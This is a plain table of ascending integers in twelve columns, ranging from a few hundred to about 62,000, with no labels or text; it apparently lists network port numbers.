439   1763  3268  5624	7674  9687  19615 27798 39138 45334 46620 55155
440   1764  3269  5625	7675  9694  19702 27806 39150 45335 46622 55169
441   1765  3270  5626	7676  9695  19705 27808 39193 45336 46623 55170
442   1766  3271  5630	7677  9696  19716 27837 39200 45337 46624 55201
445   1767  3272  5631	7678  9699  19729 27840 39205 45338 46625 55202
446   1768  3273  5632	7679  9700  19735 27844 39218 45340 46626 55203
447   1769  3274  5637	7680  9701  19745 27857 39253 45341 46627 55222
448   1770  3275  5640	7687  9702  19750 27890 39301 45342 46628 55237
450   1771  3276  5642	7688  9703  19776 27904 39330 45343 46629 55245
451   1772  3277  5643	7689  9708  19785 27933 39349 45344 46630 55250
452   1773  3278  5644	7690  9710  19793 27938 39389 45345 46631 55252
453   1774  3279  5646	7695  9712  19799 27950 39393 45346 46632 55256
454   1775  3280  5647	7699  9713  19807 27952 39397 45347 46633 55269
455   1776  3281  5648	7700  9714  19816 27970 39455 45348 46634 55277
456   1777  3282  5650	7701  9715  19820 27974 39500 45349 46635 55278
457   1778  3283  5651	7704  9721  19824 27984 39502 45350 46636 55279
458   1779  3284  5652	7705  9722  19825 28001 39510 45351 46637 55291
459   1780  3285  5653	7706  9723  19828 28005 39532 45352 46638 55303
460   1781  3286  5654	7707  9724  19833 28008 39592 45353 46639 55309
461   1782  3287  5657	7708  9725  19861 28016 39612 45354 46641 55316
462   1783  3288  5658	7709  9726  19870 28017 39618 45355 46642 55323
463   1784  3289  5659	7710  9727  19876 28031 39682 45357 46643 55326
464   1785  3290  5667	7711  9728  19888 28035 39733 45358 46644 55331
465   1786  3291  5670	7712  9729  19889 28046 39770 45359 46645 55343
466   1787  3292  5671	7714  9733  19895 28054 39772 45360 46646 55345
467   1788  3293  5674	7715  9739  19910 28096 39799 45361 46647 55346
468   1789  3294  5675	7717  9740  19924 28107 39802 45362 46648 55375
469   1790  3295  5678	7718  9741  19943 28144 39804 45363 46649 55389
470   1791  3296  5679	7719  9742  19982 28193 39820 45364 46650 55392
471   1792  3297  5683	7720  9743  19986 28210 39833 45365 46651 55412
472   1793  3298  5686	7721  9744  19989 28212 39864 45366 46652 55437
473   1794  3299  5687	7722  9745  19990 28227 39875 45367 46653 55438
474   1795  3300  5688	7725  9746  19991 28228 39900 45368 46654 55441
475   1796  3301  5692	7728  9753  19996 28238 39905 45369 46656 55443
476   1797  3302  5693	7730  9760  19999 28269 39906 45370 46657 55444
477   1798  3303  5695	7731  9762  20000 28270 39916 45371 46658 55479
479   1799  3304  5696	7732  9764  20005 28320 39917 45372 46659 55485
480   1800  3305  5699	7733  9765  20007 28334 39920 45373 46660 55486
481   1801  3306  5703	7737  9769  20014 28336 39968 45374 46661 55487
482   1802  3307  5709	7738  9777  20016 28337 39987 45375 46662 55490
483   1803  3308  5710	7739  9778  20048 28342 39990 45376 46664 55499
484   1804  3309  5713	7740  9779  20062 28354 39994 45377 46665 55500
485   1805  3310  5718	7743  9780  20073 28365 40000 45378 46666 55501
486   1806  3311  5723	7744  9783  20078 28372 40001 45379 46667 55504
487   1807  3312  5724	7747  9785  20082 28374 40004 45380 46668 55505
488   1808  3313  5725	7748  9786  20092 28385 40005 45381 46669 55508
489   1809  3314  5733	7750  9787  20102 28391 40012 45382 46670 55509
490   1810  3315  5734	7751  9788  20108 28461 40021 45383 46671 55510
491   1811  3316  5743	7752  9790  20110 28480 40030 45384 46673 55513
492   1812  3317  5745	7753  9791  20122 28481 40031 45386 46674 55516
493   1813  3318  5747	7755  9792  20134 28497 40035 45387 46675 55517
494   1814  3319  5750	7757  9797  20137 28499 40051 45388 46677 55521
495   1815  3320  5751	7758  9798  20145 28528 40056 45389 46678 55524
496   1816  3321  5752	7760  9799  20150 28560 40081 45390 46679 55525
497   1817  3322  5753	7761  9802  20151 28622 40096 45391 46680 55529
498   1818  3323  5754	7762  9803  20153 28650 40101 45392 46681 55532
499   1819  3324  5756	7765  9804  20158 28702 40106 45393 46682 55534
500   1820  3325  5758	7766  9805  20159 28710 40108 45394 46683 55535
501   1821  3326  5760	7767  9806  20161 28714 40119 45395 46684 55537
502   1822  3327  5761	7768  9807  20169 28723 40123 45397 46685 55544
503   1823  3328  5765	7770  9808  20171 28767 40130 45398 46686 55550
504   1824  3329  5766	7771  9809  20177 28768 40139 45399 46687 55555
505   1825  3330  5767	7772  9810  20179 28786 40148 45400 46689 55557
506   1826  3331  5770	7773  9814  20183 28798 40151 45401 46691 55562
507   1827  3332  5774	7774  9815  20184 28819 40156 45402 46692 55563
508   1828  3333  5775	7775  9816  20185 28822 40157 45403 46693 55564
509   1829  3334  5777	7776  9820  20186 28899 40160 45404 46694 55566
510   1830  3335  5779	7777  9821  20187 28900 40186 45405 46695 55571
511   1831  3336  5785	7778  9822  20198 28998 40189 45406 46696 55581
512   1832  3337  5790	7779  9823  20201 28999 40190 45407 46697 55588
513   1833  3338  5797	7780  9830  20202 29000 40192 45408 46698 55592
514   1834  3339  5806	7781  9832  20214 29005 40196 45409 46700 55609
515   1835  3340  5812	7782  9833  20222 29009 40201 45411 46701 55617
516   1836  3341  5817	7783  9834  20231 29019 40206 45412 46702 55621
517   1837  3342  5824	7784  9835  20243 29026 40213 45413 46703 55631
518   1838  3343  5830	7785  9836  20251 29043 40220 45414 46704 55668
519   1839  3344  5831	7786  9837  20265 29091 40240 45416 46705 55678
520   1840  3345  5832	7787  9841  20289 29129 40242 45417 46706 55688
521   1841  3346  5833	7788  9842  20290 29143 40246 45418 46707 55698
522   1842  3347  5835	7789  9843  20351 29156 40248 45419 46708 55716
523   1843  3348  5836	7790  9850  20390 29167 40251 45420 46709 55725
524   1844  3349  5837	7791  9851  20400 29172 40252 45421 46710 55734
525   1845  3350  5838	7792  9852  20417 29223 40296 45422 46711 55746
526   1846  3351  5839	7793  9854  20442 29231 40308 45423 46712 55748
527   1847  3352  5840	7794  9857  20460 29238 40315 45424 46713 55772
528   1848  3353  5841	7795  9868  20489 29241 40327 45425 46714 55786
529   1849  3354  5844	7796  9869  20495 29250 40334 45426 46715 55811
530   1850  3355  5848	7797  9870  20505 29253 40348 45428 46716 55842
531   1851  3356  5850	7798  9872  20515 29287 40382 45429 46719 55844
532   1852  3357  5851	7799  9874  20522 29291 40389 45430 46720 55866
533   1853  3358  5852	7800  9876  20523 29293 40423 45431 46721 55877
534   1854  3359  5853	7801  9877  20530 29298 40430 45432 46722 55880
535   1855  3360  5854	7802  9878  20533 29299 40444 45433 46723 55889
536   1856  3361  5855	7803  9879  20556 29348 40478 45434 46724 55894
537   1857  3362  5856	7804  9883  20571 29379 40492 45435 46725 55899
538   1858  3363  5857	7805  9884  20580 29413 40510 45436 46726 55925
539   1859  3364  5858	7806  9885  20581 29427 40526 45437 46727 55946
540   1860  3365  5860	7807  9889  20589 29431 40540 45438 46729 55955
541   1861  3366  5861	7808  9890  20604 29446 40567 45439 46731 55972
542   1862  3367  5862	7809  9891  20611 29485 40574 45440 46734 55973
543   1863  3368  5863	7810  9892  20677 29488 40584 45442 46736 55976
544   1864  3369  5864	7811  9893  20689 29519 40607 45443 46739 55982
545   1865  3370  5865	7812  9894  20697 29523 40615 45444 46740 55985
546   1866  3371  5866	7814  9895  20700 29529 40620 45445 46741 55993
547   1867  3372  5867	7816  9898  20713 29588 40622 45447 46742 56000
548   1868  3373  5868	7817  9899  20736 29609 40661 45448 46743 56006
549   1869  3374  5872	7818  9900  20763 29611 40670 45449 46744 56014
550   1870  3375  5876	7822  9901  20766 29623 40697 45450 46745 56021
551   1871  3376  5877	7828  9902  20776 29636 40728 45451 46746 56033
552   1872  3377  5878	7829  9903  20824 29684 40754 45452 46747 56039
553   1873  3378  5880	7830  9905  20836 29701 40777 45453 46749 56053
554   1874  3379  5882	7831  9906  20846 29721 40824 45454 46750 56069
555   1875  3380  5884	7832  9907  20851 29746 40835 45455 46751 56084
556   1876  3381  5885	7833  9908  20854 29761 40844 45457 46752 56100
557   1877  3382  5886	7841  9909  20861 29815 40848 45458 46753 56101
558   1878  3383  5888	7845  9910  20872 29817 40860 45459 46754 56114
559   1879  3384  5889	7848  9911  20889 29865 40884 45460 46755 56117
560   1880  3385  5890	7849  9912  20891 29902 40900 45462 46757 56125
561   1881  3386  5893	7850  9916  20895 29911 40910 45463 46758 56130
562   1882  3387  5898	7851  9919  20900 29913 40927 45464 46759 56142
563   1883  3388  5900	7857  9920  20930 29919 40929 45465 46760 56210
564   1884  3389  5901	7858  9925  20931 29933 40932 45466 46761 56238
565   1885  3390  5902	7865  9926  20957 29959 40956 45467 46762 56261
566   1886  3391  5903	7868  9927  20972 29967 40977 45468 46763 56278
567   1887  3392  5904	7869  9928  20980 30000 41000 45469 46764 56341
568   1888  3393  5905	7870  9929  20999 30001 41003 45470 46765 56357
569   1889  3394  5907	7871  9930  21000 30002 41004 45472 46766 56382
570   1890  3395  5908	7872  9931  21001 30003 41005 45473 46767 56387
571   1891  3396  5909	7874  9932  21003 30005 41006 45474 46768 56418
572   1892  3397  5910	7875  9933  21005 30007 41007 45475 46769 56423
573   1893  3398  5911	7876  9937  21012 30010 41010 45476 46770 56478
574   1894  3399  5912	7877  9939  21015 30011 41019 45477 46771 56516
575   1895  3400  5913	7878  9943  21018 30016 41020 45478 46772 56524
576   1896  3401  5915	7879  9944  21019 30018 41022 45479 46773 56551
577   1897  3402  5920	7880  9945  21020 30020 41026 45480 46774 56578
578   1898  3403  5922	7881  9946  21037 30024 41027 45481 46775 56597
579   1899  3404  5923	7882  9947  21038 30028 41046 45482 46776 56622
580   1900  3405  5925	7883  9948  21049 30030 41050 45483 46777 56629
581   1901  3406  5929	7884  9952  21051 30034 41051 45484 46778 56650
582   1902  3407  5930	7885  9955  21052 30039 41065 45485 46780 56658
583   1903  3408  5931	7886  9960  21058 30054 41068 45486 46781 56663
584   1904  3409  5932	7888  9961  21071 30057 41071 45487 46782 56682
585   1905  3410  5934	7889  9962  21082 30060 41072 45488 46783 56762
586   1906  3411  5938	7890  9963  21097 30063 41094 45489 46784 56769
587   1907  3412  5939	7891  9966  21101 30069 41096 45490 46785 56770
588   1908  3413  5940	7892  9968  21106 30070 41097 45491 46786 56780
589   1909  3414  5941	7893  9970  21107 30071 41105 45492 46787 56789
590   1910  3415  5942	7896  9971  21108 30100 41112 45493 46788 56803
591   1911  3416  5943	7898  9972  21110 30103 41123 45494 46790 56830
592   1912  3417  5946	7899  9976  21113 30107 41132 45495 46791 56852
593   1913  3418  5947	7900  9977  21117 30114 41145 45496 46792 56853
594   1914  3419  5948	7901  9978  21123 30115 41146 45497 46793 56914
595   1915  3420  5949	7903  9979  21128 30122 41155 45499 46794 56933
596   1916  3421  5950	7904  9980  21164 30133 41158 45500 46795 56934
597   1917  3422  5951	7905  9981  21167 30151 41163 45501 46796 56938
598   1918  3423  5952	7908  9982  21193 30159 41165 45502 46797 56960
599   1919  3424  5953	7909  9983  21195 30168 41171 45503 46798 56986
600   1920  3425  5954	7910  9984  21200 30170 41174 45504 46799 57005
601   1921  3426  5956	7911  9985  21206 30179 41194 45505 46800 57010
602   1922  3427  5957	7913  9986  21212 30183 41211 45506 46801 57020
603   1923  3428  5958	7916  9987  21215 30188 41213 45507 46802 57034
604   1924  3429  5959	7917  9988  21221 30196 41234 45508 46803 57057
605   1925  3430  5960	7918  9989  21230 30199 41238 45509 46804 57103
606   1926  3431  5961	7919  9990  21231 30218 41242 45510 46805 57105
607   1927  3432  5963	7923  9991  21241 30220 41246 45511 46806 57106
608   1928  3433  5964	7927  9992  21243 30221 41271 45512 46807 57107
609   1929  3434  5965	7928  9993  21279 30225 41281 45513 46808 57118
610   1930  3435  5969	7929  9994  21289 30229 41282 45514 46809 57141
611   1931  3436  5972	7930  9995  21302 30230 41286 45515 46810 57153
612   1932  3437  5975	7931  9996  21324 30250 41298 45517 46811 57157
613   1933  3438  5979	7932  9997  21338 30299 41299 45518 46812 57232
614   1934  3439  5980	7933  9998  21355 30300 41300 45519 46813 57253
615   1935  3440  5981	7935  9999  21356 30301 41307 45521 46814 57291
616   1936  3441  5983	7937  10000 21365 30303 41318 45522 46815 57322
617   1937  3442  5985	7940  10001 21385 30308 41319 45523 46817 57325
618   1938  3443  5986	7942  10002 21386 30309 41338 45524 46818 57346
619   1939  3444  5987	7943  10003 21389 30321 41372 45525 46820 57355
620   1940  3445  5988	7944  10004 21391 30324 41386 45528 46821 57371
621   1941  3446  5989	7945  10005 21401 30325 41389 45529 46822 57375
622   1942  3447  5990	7950  10006 21407 30331 41401 45530 46823 57381
623   1943  3448  5991	7951  10007 21411 30333 41414 45531 46824 57391
624   1944  3449  5992	7952  10009 21433 30347 41415 45532 46825 57394
625   1945  3450  5993	7953  10010 21435 30353 41418 45533 46827 57411
626   1946  3451  5994	7956  10011 21446 30357 41466 45534 46828 57418
627   1947  3452  5995	7957  10012 21447 30359 41482 45535 46829 57425
628   1948  3453  5996	7958  10013 21452 30362 41499 45536 46830 57463
629   1949  3454  5997	7959  10018 21478 30367 41501 45537 46831 57490
630   1950  3455  5998	7960  10019 21542 30376 41502 45539 46832 57521
631   1951  3456  5999	7961  10020 21552 30379 41503 45540 46834 57555
632   1952  3457  6000	7962  10021 21577 30382 41511 45541 46835 57563
633   1953  3458  6001	7963  10022 21579 30389 41522 45542 46836 57575
634   1954  3459  6002	7964  10023 21596 30390 41530 45543 46837 57577
635   1955  3460  6003	7965  10026 21670 30406 41534 45544 46838 57603
636   1956  3461  6004	7966  10027 21673 30407 41561 45545 46840 57669
637   1957  3462  6005	7967  10034 21708 30410 41579 45546 46841 57676
638   1958  3463  6006	7969  10036 21711 30412 41582 45547 46842 57705
639   1959  3464  6007	7970  10037 21721 30416 41583 45549 46843 57712
640   1960  3465  6008	7971  10038 21730 30458 41587 45550 46844 57723
666   1961  3466  6009	7972  10040 21734 30502 41624 45552 46845 57729
681   1962  3467  6010	7973  10042 21769 30551 41648 45553 46846 57737
682   1963  3468  6011	7975  10043 21817 30561 41660 45554 46847 57772
683   1964  3469  6012	7976  10044 21846 30566 41714 45556 46848 57816
684   1965  3470  6016	7977  10046 21865 30600 41758 45557 46849 57826
685   1966  3471  6019	7978  10050 21902 30614 41770 45558 46850 57843
686   1967  3472  6020	7979  10051 21914 30621 41792 45560 46852 57861
687   1968  3473  6021	7980  10052 21919 30632 41810 45561 46853 57872
688   1969  3474  6023	7982  10053 21926 30636 41849 45562 46854 57893
689   1970  3475  6026	7983  10055 21940 30647 41858 45563 46855 57900
690   1971  3476  6027	7984  10057 21951 30657 41864 45565 46856 57922
691   1972  3477  6030	7985  10058 21953 30670 41866 45566 46857 57929
692   1973  3478  6034	7986  10059 21954 30678 41901 45567 46858 57930
693   1974  3479  6035	7987  10062 21961 30680 41906 45568 46859 58000
694   1975  3480  6036	7988  10066 21974 30683 41919 45571 46860 58005
695   1976  3481  6046	7989  10067 21990 30698 41935 45572 46861 58009
696   1977  3482  6050	7990  10068 22000 30703 41953 45573 46862 58010
697   1978  3483  6051	7991  10072 22004 30727 41954 45574 46864 58018
698   1979  3484  6052	7992  10073 22005 30789 41962 45576 46865 58054
699   1980  3485  6053	7998  10074 22012 30797 41983 45577 46866 58059
700   1981  3486  6054	7999  10075 22020 30799 42005 45578 46867 58071
701   1982  3487  6057	8001  10076 22025 30800 42012 45579 46868 58121
702   1983  3488  6058	8002  10077 22031 30801 42013 45580 46870 58123
703   1984  3489  6059	8003  10078 22047 30803 42014 45581 46871 58126
704   1985  3490  6060	8004  10079 22051 30805 42020 45582 46873 58147
705   1986  3491  6061	8005  10080 22084 30808 42036 45583 46874 58194
706   1987  3492  6062	8006  10081 22091 30815 42038 45584 46875 58210
707   1988  3493  6063	8008  10082 22105 30823 42042 45585 46876 58213
708   1989  3494  6066	8009  10083 22119 30827 42050 45586 46877 58294
709   1990  3495  6067	8010  10086 22122 30842 42055 45587 46878 58306
710   1991  3496  6068	8011  10087 22124 30847 42098 45589 46879 58312
711   1992  3497  6069	8012  10088 22125 30871 42101 45590 46880 58347
712   1993  3499  6070	8013  10089 22127 30895 42106 45591 46881 58371
713   1994  3500  6071	8015  10100 22132 30919 42153 45592 46882 58377
714   1995  3501  6072	8017  10101 22134 30923 42154 45593 46883 58389
715   1996  3502  6073	8018  10102 22180 30933 42159 45594 46884 58402
716   1997  3503  6074	8019  10113 22182 30943 42177 45595 46885 58409
717   1998  3504  6075	8020  10118 22199 30949 42202 45596 46886 58429
718   1999  3505  6078	8021  10121 22200 30971 42212 45597 46887 58430
719   2001  3506  6080	8022  10127 22202 30989 42223 45598 46888 58446
720   2002  3507  6082	8023  10128 22206 30991 42251 45599 46889 58450
721   2003  3508  6085	8024  10132 22210 30996 42260 45600 46890 58501
722   2004  3511  6086	8025  10134 22212 31001 42297 45601 46891 58520
723   2005  3512  6087	8026  10138 22222 31004 42308 45602 46892 58555
724   2006  3513  6089	8027  10142 22225 31013 42346 45603 46894 58581
725   2007  3514  6090	8028  10147 22230 31015 42350 45604 46895 58587
726   2008  3515  6092	8030  10151 22241 31020 42356 45605 46896 58611
727   2009  3517  6094	8031  10153 22243 31029 42389 45606 46897 58635
728   2010  3518  6095	8032  10158 22278 31037 42401 45607 46899 58693
729   2011  3519  6096	8033  10167 22289 31059 42404 45608 46900 58700
730   2012  3520  6097	8034  10171 22300 31060 42424 45609 46901 58720
731   2013  3521  6098	8035  10199 22333 31063 42434 45610 46902 58758
732   2014  3522  6100	8036  10201 22339 31066 42446 45611 46903 58793
733   2015  3523  6101	8037  10222 22348 31068 42500 45612 46905 58824
734   2016  3526  6102	8038  10225 22349 31071 42506 45613 46906 58836
735   2017  3528  6104	8039  10238 22356 31075 42509 45614 46907 58843
736   2018  3529  6106	8040  10239 22367 31087 42516 45615 46908 58916
737   2019  3530  6107	8041  10242 22383 31097 42521 45616 46909 58951
738   2020  3532  6109	8044  10245 22417 31098 42548 45617 46911 58965
739   2021  3533  6110	8045  10248 22418 31100 42569 45618 46912 59000
740   2022  3534  6111	8048  10263 22444 31108 42586 45619 46913 59001
741   2023  3535  6112	8050  10267 22457 31111 42590 45620 46914 59009
742   2024  3536  6113	8053  10270 22459 31126 42594 45621 46915 59012
743   2025  3540  6114	8055  10278 22470 31137 42606 45622 46916 59060
744   2026  3542  6115	8059  10280 22482 31141 42617 45623 46917 59107
745   2027  3544  6116	8060  10289 22500 31154 42628 45624 46918 59108
746   2028  3545  6118	8061  10293 22509 31159 42634 45625 46919 59110
747   2029  3547  6119	8067  10294 22518 31160 42654 45626 46920 59135
749   2030  3548  6121	8069  10300 22520 31163 42658 45627 46921 59143
750   2031  3551  6123	8076  10314 22521 31165 42667 45628 46922 59211
751   2032  3552  6124	8079  10317 22530 31200 42668 45630 46923 59234
752   2033  3557  6126	8080  10331 22566 31201 42687 45631 46924 59235
753   2034  3558  6128	8081  10332 22614 31207 42702 45633 46925 59239
754   2035  3559  6129	8082  10337 22619 31218 42717 45634 46926 59250
755   2036  3560  6130	8083  10339 22682 31231 42718 45635 46927 59256
756   2037  3561  6131	8085  10353 22683 31245 42722 45636 46928 59283
757   2038  3562  6132	8088  10354 22685 31250 42757 45637 46929 59300
758   2039  3563  6133	8089  10357 22701 31255 42769 45638 46930 59331
759   2040  3564  6136	8090  10367 22750 31258 42789 45639 46931 59391
760   2041  3565  6137	8091  10369 22758 31279 42806 45640 46932 59411
761   2042  3566  6138	8092  10370 22775 31291 42834 45641 46933 59550
762   2043  3567  6140	8094  10381 22780 31293 42836 45642 46934 59571
763   2044  3568  6141	8095  10386 22781 31302 42837 45643 46935 59591
764   2045  3569  6142	8096  10389 22782 31303 42865 45644 46936 59592
765   2046  3570  6144	8097  10390 22806 31307 42872 45645 46937 59639
766   2047  3571  6145	8098  10391 22808 31320 42886 45646 46938 59698
767   2048  3572  6146	8099  10404 22809 31324 42901 45647 46939 59713
768   2049  3573  6147	8100  10412 22810 31337 42903 45648 46940 59714
769   2050  3575  6148	8101  10418 22817 31338 42930 45649 46941 59768
770   2051  3577  6149	8102  10421 22818 31373 42933 45651 46943 59797
771   2052  3579  6154	8104  10428 22819 31389 42942 45652 46944 59834
772   2053  3580  6155	8105  10430 22840 31399 42951 45653 46945 59862
773   2054  3582  6161	8107  10434 22846 31400 42954 45654 46946 59863
774   2055  3583  6162	8108  10442 22854 31419 42959 45655 46948 59885
775   2056  3584  6163	8109  10443 22857 31420 42962 45656 46950 59906
776   2057  3586  6164	8110  10451 22862 31440 42964 45657 46952 59938
777   2058  3587  6166	8115  10453 22863 31447 42967 45658 46953 59951
778   2059  3589  6167	8116  10457 22864 31492 42975 45660 46954 59995
779   2060  3590  6168	8117  10462 22865 31529 42977 45661 46955 59999
780   2061  3591  6169	8118  10467 22866 31543 42981 45662 46956 60000
781   2062  3592  6170	8120  10469 22867 31567 42986 45663 46957 60001
782   2063  3593  6171	8122  10476 22868 31589 42990 45664 46959 60002
783   2064  3597  6178	8124  10478 22869 31591 42997 45665 46960 60003
784   2065  3599  6179	8129  10485 22870 31604 42998 45666 46961 60004
785   2066  3600  6180	8130  10500 22874 31606 43002 45668 46962 60005
786   2067  3601  6181	8133  10504 22875 31639 43003 45669 46963 60007
787   2068  3607  6182	8137  10505 22876 31643 43004 45671 46964 60010
788   2069  3611  6183	8138  10515 22880 31656 43005 45672 46965 60023
789   2070  3612  6186	8139  10521 22881 31661 43009 45673 46966 60031
790   2071  3613  6187	8142  10524 22882 31675 43011 45674 46967 60037
791   2072  3616  6188	8143  10525 22886 31689 43030 45675 46969 60055
792   2073  3617  6190	8144  10530 22887 31700 43061 45676 46970 60070
793   2074  3621  6191	8146  10532 22889 31711 43084 45677 46971 60101
794   2075  3625  6192	8150  10538 22894 31729 43086 45678 46972 60106
795   2076  3627  6194	8152  10545 22898 31730 43100 45679 46973 60109
796   2077  3633  6196	8154  10551 22899 31746 43102 45680 46974 60110
797   2078  3639  6199	8155  10552 22900 31751 43110 45682 46975 60135
798   2079  3650  6200	8162  10555 22921 31798 43121 45683 46977 60150
799   2080  3651  6202	8164  10556 22929 31805 43125 45684 46978 60154
800   2081  3653  6203	8167  10572 22931 31825 43131 45685 46979 60189
801   2082  3655  6212	8168  10576 22942 31826 43133 45686 46980 60224
803   2083  3656  6214	8169  10589 22943 31834 43134 45687 46982 60226
804   2084  3658  6215	8170  10608 22944 31840 43138 45688 46983 60230
805   2085  3671  6216	8173  10609 22945 31847 43148 45689 46984 60234
806   2086  3675  6218	8174  10617 22946 31883 43149 45691 46985 60250
807   2087  3678  6219	8175  10618 22947 31894 43150 45692 46986 60300
808   2088  3679  6221	8176  10620 22948 31900 43151 45694 46987 60303
809   2089  3681  6222	8177  10623 22949 31901 43157 45695 46988 60316
810   2090  3685  6223	8178  10627 22950 31905 43160 45696 46989 60329
811   2091  3686  6224	8180  10629 22951 31923 43163 45697 46990 60340
812   2092  3687  6225	8182  10649 22952 31930 43175 45698 46991 60346
813   2093  3690  6227	8183  10654 22953 31952 43177 45699 46992 60371
814   2094  3695  6231	8185  10663 22954 31970 43182 45700 46994 60385
815   2095  3696  6232	8186  10664 22958 31972 43186 45701 46995 60394
816   2096  3699  6233	8187  10666 22959 31975 43193 45702 46996 60442
817   2097  3700  6236	8189  10689 22960 31978 43202 45703 46998 60490
818   2098  3701  6238	8191  10699 22973 31997 43203 45704 46999 60499
819   2099  3703  6243	8192  10700 22974 32001 43204 45705 47000 60500
820   2100  3705  6244	8193  10703 22975 32005 43210 45706 47001 60515
821   2101  3708  6246	8195  10713 22979 32010 43228 45707 47003 60530
822   2102  3709  6247	8205  10729 22987 32017 43247 45708 47005 60538
823   2103  3714  6248	8206  10746 22999 32023 43248 45709 47017 60561
824   2104  3715  6249	8211  10751 23000 32041 43257 45710 47018 60601
825   2105  3719  6250	8212  10757 23010 32045 43261 45711 47020 60634
826   2106  3733  6251	8213  10759 23015 32050 43264 45713 47022 60642
827   2107  3737  6252	8214  10764 23016 32061 43265 45714 47029 60704
828   2108  3744  6255	8219  10765 23017 32075 43266 45715 47035 60705
829   2109  3755  6256	8220  10771 23018 32093 43268 45716 47037 60752
830   2110  3768  6257	8221  10795 23019 32095 43271 45717 47039 60772
831   2111  3770  6258	8225  10803 23020 32100 43273 45718 47041 60777
832   2112  3775  6259	8227  10810 23021 32115 43287 45719 47044 60819
833   2113  3777  6261	8229  10812 23022 32117 43298 45720 47045 60853
834   2114  3778  6262	8231  10814 23023 32123 43320 45721 47047 60866
835   2115  3791  6263	8232  10816 23024 32132 43325 45722 47048 60945
836   2116  3792  6264	8236  10827 23025 32148 43337 45723 47052 61005
837   2117  3795  6265	8239  10843 23026 32158 43343 45724 47055 61018
838   2118  3798  6266	8241  10873 23030 32166 43346 45726 47058 61022
839   2119  3799  6267	8242  10888 23031 32168 43358 45727 47059 61026
840   2120  3800  6268	8243  10893 23032 32170 43370 45728 47060 61028
841   2121  3807  6269	8244  10895 23051 32186 43375 45729 47063 61029
842   2122  3810  6276	8245  10919 23052 32189 43383 45730 47064 61045
843   2123  3814  6277	8249  10921 23053 32201 43385 45731 47065 61047
844   2124  3817  6284	8251  10923 23061 32203 43386 45732 47066 61050
845   2125  3818  6286	8252  10925 23090 32210 43388 45733 47072 61077
846   2126  3825  6288	8253  10956 23091 32231 43389 45734 47073 61086
847   2127  3827  6289	8254  10983 23092 32249 43390 45736 47075 61111
848   2128  3831  6292	8255  10989 23093 32255 43391 45737 47076 61113
849   2129  3835  6293	8256  10991 23094 32275 43392 45738 47081 61132
850   2130  3839  6294	8260  10998 23095 32315 43405 45739 47083 61134
851   2131  3840  6295	8261  10999 23096 32329 43406 45740 47084 61171
852   2132  3842  6296	8262  11000 23097 32330 43409 45741 47085 61189
853   2133  3843  6297	8264  11001 23098 32351 43414 45743 47086 61232
854   2134  3848  6300	8269  11002 23099 32357 43423 45744 47090 61233
855   2135  3856  6301	8270  11003 23100 32359 43425 45745 47093 61234
856   2136  3864  6302	8271  11004 23101 32363 43433 45746 47095 61235
857   2137  3869  6304	8276  11005 23105 32364 43435 45747 47098 61264
858   2138  3871  6305	8277  11006 23106 32374 43438 45748 47099 61286
859   2139  3875  6306	8279  11007 23107 32384 43449 45749 47101 61297
860   2140  3876  6310	8281  11008 23108 32385 43476 45750 47105 61300
861   2141  3881  6311	8282  11009 23109 32389 43488 45751 47107 61310
862   2142  3886  6313	8289  11010 23110 32393 43489 45752 47109 61360
863   2143  3889  6314	8293  11011 23121 32405 43505 45753 47111 61372
864   2144  3890  6318	8294  11012 23125 32424 43510 45754 47114 61373
865   2145  3891  6320	8295  11013 23132 32441 43536 45755 47115 61382
866   2146  3897  6321	8298  11014 23133 32457 43553 45756 47117 61393
867   2147  3898  6322	8300  11015 23134 32459 43568 45757 47118 61403
868   2148  3899  6323	8301  11016 23142 32500 43570 45760 47127 61421
869   2149  3900  6324	8308  11017 23165 32502 43577 45761 47128 61427
870   2150  3901  6325	8310  11018 23166 32507 43587 45763 47129 61438
871   2151  3905  6326	8311  11019 23167 32526 43590 45764 47131 61456
872   2152  3907  6327	8314  11020 23171 32547 43595 45765 47136 61473
873   2153  3910  6329	8315  11026 23172 32550 43607 45766 47138 61479
874   2154  3911  6330	8316  11035 23173 32551 43628 45767 47139 61485
875   2155  3922  6331	8318  11039 23174 32555 43649 45768 47140 61491
876   2156  3923  6332	8320  11074 23175 32566 43652 45769 47141 61508
877   2157  3937  6333	8326  11083 23176 32585 43654 45770 47143 61511
878   2158  3940  6334	8327  11087 23177 32601 43657 45772 47144 61554
879   2159  3946  6336	8328  11089 23178 32612 43672 45773 47145 61557
880   2160  3963  6338	8329  11100 23179 32643 43680 45774 47147 61560
881   2161  3972  6340	8330  11102 23180 32668 43723 45775 47149 61584
882   2162  3986  6342	8331  11110 23182 32676 43733 45776 47152 61612
883   2163  3988  6343	8335  11111 23186 32681 43746 45777 47157 61616
884   2164  3990  6344	8336  11112 23187 32711 43776 45778 47159 61619
885   2165  3991  6345	8337  11125 23188 32713 43777 45779 47160 61620
886   2166  3995  6346	8338  11126 23194 32729 43785 45780 47168 61625
887   2167  3996  6347	8342  11136 23204 32764 43790 45781 47174 61635
888   2168  3998  6348	8344  11146 23205 32768 43800 45782 47176 61660
889   2169  3999  6351	8345  11150 23206 32800 43815 45783 47179 61696
890   2170  4000  6352	8346  11153 23208 32805 43824 45784 47180 61699
891   2171  4001  6354	8350  11172 23227 32809 43825 45785 47184 61705
892   2172  4002  6356	8356  11184 23232 32831 43849 45786 47185 61745
893   2173  4003  6360	8361  11201 23234 32860 43855 45787 47187 61758
894   2174  4004  6361	8374  11203 23235 32867 43861 45789 47189 61784
896   2175  4005  6362	8375  11207 23236 32871 43863 45790 47191 61787
897   2176  4007  6363	8376  11208 23242 32889 43888 45791 47193 61797
898   2177  4010  6364	8379  11209 23243 32894 43897 45792 47195 61817
899   2178  4018  6365	8382  11211 23244 32927 43898 45793 47197 61840
900   2179  4019  6366	8383  11227 23245 32934 43911 45794 47198 61845
901   2180  4020  6367	8386  11242 23246 32999 43932 45795 47202 61863
902   2181  4022  6368	8389  11245 23247 33000 43944 45796 47226 61883
903   2182  4025  6369	8390  11256 23248 33002 43950 45797 47234 61932
904   2183  4027  6370	8391  11271 23249 33003 43959 45798 47242 61942
905   2184  4028  6371	8392  11275 23250 33005 43972 45799 47250 61954
906   2185  4029  6376	8393  11300 23251 33010 43987 45800 47258 61955
907   2186  4031  6377	8394  11332 23258 33012 43989 45801 47306 61970
908   2187  4032  6378	8397  11333 23259 33025 43990 45803 47347 61993
909   2188  4035  6379	8399  11335 23260 33027 43999 45804 47389 62000
910   2189  4040  6380	8401  11336 23261 33029 44000 45805 47437 62001
911   2190  4041  6382	8402  11360 23262 33038 44002 45806 47473 62005
912   2191  4043  6383	8403  11362 23263 33049 44005 45807 47477 62011
